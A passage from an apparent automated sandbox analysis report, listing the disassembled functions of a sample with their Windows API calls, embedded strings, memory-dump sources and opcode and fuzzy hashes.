                                                                                                                                                                        • Opcode Fuzzy Hash: 5c3f8e204cc326aa710b15330969429212a1f401a9b437fb3f9a2b2027b9ea8f
                                                                                                                                                                        • Instruction Fuzzy Hash: 12E1C071A00605AFDB20DF68CC48FAFBBE8EF45310F1441ADE915EB291DB74A944CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE84B0 Relevance: 16.6, APIs: 1, Strings: 8, Instructions: 843windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BE84FC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID: ' AND `Control_`='$AiTabPage$ControlEvent$Dialog$Lt$SpawnDialog$Title$`Dialog_`='
                                                                                                                                                                        • API String ID: 3850602802-3052257113
                                                                                                                                                                        • Opcode ID: 15c7851d77c9bdef7b7ee46fdf623d53093da4d658ece1637ef27d94c4e43dd5
                                                                                                                                                                        • Instruction ID: b7fc15ab2674e32eb2d04478c25b2fbd5404958f9c08c2aa9c120c4db844ee76
                                                                                                                                                                        • Opcode Fuzzy Hash: 15c7851d77c9bdef7b7ee46fdf623d53093da4d658ece1637ef27d94c4e43dd5
                                                                                                                                                                        • Instruction Fuzzy Hash: 4972A071D00658DFDB14DFA8C885BEDB7F1FF58304F248299E409A7291DB74AA85CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D67900 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 423fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 00D67B4B
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D67B5A
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?), ref: 00D67B64
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00D67B95
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$CreateErrorFileLast
                                                                                                                                                                        • String ID: NUMBER_OF_PROCESSORS$TQ
                                                                                                                                                                        • API String ID: 3884794734-3181195941
                                                                                                                                                                        • Opcode ID: 9eafe67c11d4fc3c1f4aa5626214fc8a18702d698a34a26a5ccdd019bf7dc7bc
                                                                                                                                                                        • Instruction ID: cf0a6c686532196cd9123248d18ff6ecbee03d6e708a34575210f71e679ceaaf
                                                                                                                                                                        • Opcode Fuzzy Hash: 9eafe67c11d4fc3c1f4aa5626214fc8a18702d698a34a26a5ccdd019bf7dc7bc
                                                                                                                                                                        • Instruction Fuzzy Hash: AE126E70904249DFDB10CFA8C884BDEBBF1FF08318F1481A9E459AB291D7759A49CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CAC450 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 367windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00CAC6D9
                                                                                                                                                                        • SendMessageW.USER32(?,00000443,00000000), ref: 00CAC743
                                                                                                                                                                        • MulDiv.KERNEL32(?,00000000), ref: 00CAC77A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendWindow
                                                                                                                                                                        • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                                                                                                                                        • API String ID: 701072176-2319862951
                                                                                                                                                                        • Opcode ID: 0882ee0e0e6f1189fc61a7da768a67f91fd62afe6888581bd54333e15c9fac2f
                                                                                                                                                                        • Instruction ID: fc5d1299972169716131fb6561e5302f60c6f050d1a0281357d65ce5191c1281
                                                                                                                                                                        • Opcode Fuzzy Hash: 0882ee0e0e6f1189fc61a7da768a67f91fd62afe6888581bd54333e15c9fac2f
                                                                                                                                                                        • Instruction Fuzzy Hash: EAD1D171A00705AFEB14CF24CC95BEEB7B5FF89300F108659E156A72D1DB74AA49CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCC040 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 240fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00CCC098
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000), ref: 00CCC198
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000), ref: 00CCC235
                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000), ref: 00CCC25B
                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000), ref: 00CCC2A5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$CloseFileFirstInit_thread_footer$HeapProcess_wcsrchr
                                                                                                                                                                        • String ID: p2
                                                                                                                                                                        • API String ID: 352340201-300010787
                                                                                                                                                                        • Opcode ID: fcb0aca55db8e574b3b41d6af9ec09af805d29b30bc26fa0bebaa4ff180af872
                                                                                                                                                                        • Instruction ID: 4a3976062beaf63a10516cf385516b0e5b66db7733b4939c41516cdfe4553195
                                                                                                                                                                        • Opcode Fuzzy Hash: fcb0aca55db8e574b3b41d6af9ec09af805d29b30bc26fa0bebaa4ff180af872
                                                                                                                                                                        • Instruction Fuzzy Hash: 5871CE71A002099FDB10DFA9CD89BAEB7F4FF45324F14826EE829D7281E7759A44CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00DA328A Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                        • Opcode ID: 41a5feb1a6228ae6b756a203f80d751b5ea6485dcbcab7604ace50158b6010a7
                                                                                                                                                                        • Instruction ID: 839151a4fad516b58fcd19e359cb29df65fa3d587445fcbb5087f348382a0913
                                                                                                                                                                        • Opcode Fuzzy Hash: 41a5feb1a6228ae6b756a203f80d751b5ea6485dcbcab7604ace50158b6010a7
                                                                                                                                                                        • Instruction Fuzzy Hash: 8CD23C71E082298FDB65CF28DC407EAB7B5EB86305F1841EAE44DE7240D774AE818F61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D108C0 Relevance: 9.2, APIs: 6, Instructions: 203fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,1FC3D414,?,00000000,00000000), ref: 00D10991
                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00000000), ref: 00D109AC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFind$FirstNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1690352074-0
                                                                                                                                                                        • Opcode ID: c4a66e3fb5fe50fe3f3fe64131ad9530c4a9732379f62d4af7a9b106d3ce9491
                                                                                                                                                                        • Instruction ID: 38484c1963b7c9a526ca1d8799a93a9ec434ba014eafde138c5de4784e74e059
                                                                                                                                                                        • Opcode Fuzzy Hash: c4a66e3fb5fe50fe3f3fe64131ad9530c4a9732379f62d4af7a9b106d3ce9491
                                                                                                                                                                        • Instruction Fuzzy Hash: 9971AE71D01249EFDB10DFA9DD48AEEBBB4FF04314F188169E815AB291DB719E48CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7F9A7 Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F8C3,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9A9
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9D0
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9D7
                                                                                                                                                                        • InitializeSListHead.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9E4
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9F9
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7FA00
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1475849761-0
                                                                                                                                                                        • Opcode ID: 45d5e0c86701470d5b6fd75220ff2ed58511d44ebccfb323cb988308ca6c15a4
                                                                                                                                                                        • Instruction ID: 0a673421e7e477c71889b39db1b4086b3f55819ac7abb7fef88f8fb5dce2f933
                                                                                                                                                                        • Opcode Fuzzy Hash: 45d5e0c86701470d5b6fd75220ff2ed58511d44ebccfb323cb988308ca6c15a4
                                                                                                                                                                        • Instruction Fuzzy Hash: F4F0AF71640A019FE7219F3AAD08B1637A8EF98B12F044439F98AE3260EF71D4488A60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD8E20 Relevance: 6.8, Strings: 5, Instructions: 567COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID: AI_EXIST_INSTANCES$AI_EXIST_NEW_INSTANCES$MultipleInstances$MultipleInstancesProps$PropertyValue
                                                                                                                                                                        • API String ID: 1385522511-2308371840
                                                                                                                                                                        • Opcode ID: 2454a9aa4d7d11f2d678f066a909f8e902842f6eccf75fa9b1e5ec9e7076e9ed
                                                                                                                                                                        • Instruction ID: 10b5815a0223acbec418abf4becbe2c8b660476e47d8c1f63f5d1665fad39e95
                                                                                                                                                                        • Opcode Fuzzy Hash: 2454a9aa4d7d11f2d678f066a909f8e902842f6eccf75fa9b1e5ec9e7076e9ed
                                                                                                                                                                        • Instruction Fuzzy Hash: A422C271D002489FDB14DFA4CC95BEEBBB1EF49314F248299E005B7391EB746A85CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D9839A Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                        • Opcode ID: cf26b04feba36ec538749ee1d57a00ae9e5f61497e5783d4f8033c0758c89abe
                                                                                                                                                                        • Instruction ID: aaf2ba8c6a842a04d2dee5b2251443d37418ddabae29c13a13f26d8203b1a309
                                                                                                                                                                        • Opcode Fuzzy Hash: cf26b04feba36ec538749ee1d57a00ae9e5f61497e5783d4f8033c0758c89abe
                                                                                                                                                                        • Instruction Fuzzy Hash: 1CB13432E042469FDF158F68C881BEEBBE5EF56700F19816AE905AF241DA35DD01DBB0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CFCDD0 Relevance: 6.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6ce6fad6d50eb5bf6e605d152d01688c8bfc83d29585ae24fee6e57f353e1bcd
                                                                                                                                                                        • Instruction ID: 56c3255635d0f503202adc76ea6f0801e2e84143d08e804dff8421eadffd2114
                                                                                                                                                                        • Opcode Fuzzy Hash: 6ce6fad6d50eb5bf6e605d152d01688c8bfc83d29585ae24fee6e57f353e1bcd
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F81BE70901218DFDB60DF28CD89BA9F7B5EF45310F1482D9E919AB292DB709E44CF92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD4B30 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
                                                                                                                                                                        • API String ID: 0-932585912
                                                                                                                                                                        • Opcode ID: 98eb2113b5b8cf7cb751a2f99ba49b896ab281d7138f7e2e65e4ed85f0b0eee6
                                                                                                                                                                        • Instruction ID: 55d19340bad92841dcd849659d326ecfe79da2477bdbfd3242f9ba44742d3135
                                                                                                                                                                        • Opcode Fuzzy Hash: 98eb2113b5b8cf7cb751a2f99ba49b896ab281d7138f7e2e65e4ed85f0b0eee6
                                                                                                                                                                        • Instruction Fuzzy Hash: 47420571D006188BDB18CF68CC95BEDB7F1FF85300F14829AE455AB392E774AA45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CFD1D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,00000000,?), ref: 00CFD28C
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00CFD3D7
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$AllocCloseFileFirstHeap
                                                                                                                                                                        • String ID: %d.%d.%d.%d
                                                                                                                                                                        • API String ID: 2507753907-3491811756
                                                                                                                                                                        • Opcode ID: ec22099285418301b5f0ebafde7aed65dbe0875f5f7fcbc9d10797d3c88d97c8
                                                                                                                                                                        • Instruction ID: 5207b1e5167305001f5d59a8616b5f7b22cd3abd0b73bba2895f0cab6ec51148
                                                                                                                                                                        • Opcode Fuzzy Hash: ec22099285418301b5f0ebafde7aed65dbe0875f5f7fcbc9d10797d3c88d97c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 6361AD70905219DFCB60DF28CC48BADBBB5EF44314F1082D9E919AB291DB329E84CF81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE73A0 Relevance: 5.4, Strings: 4, Instructions: 364COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
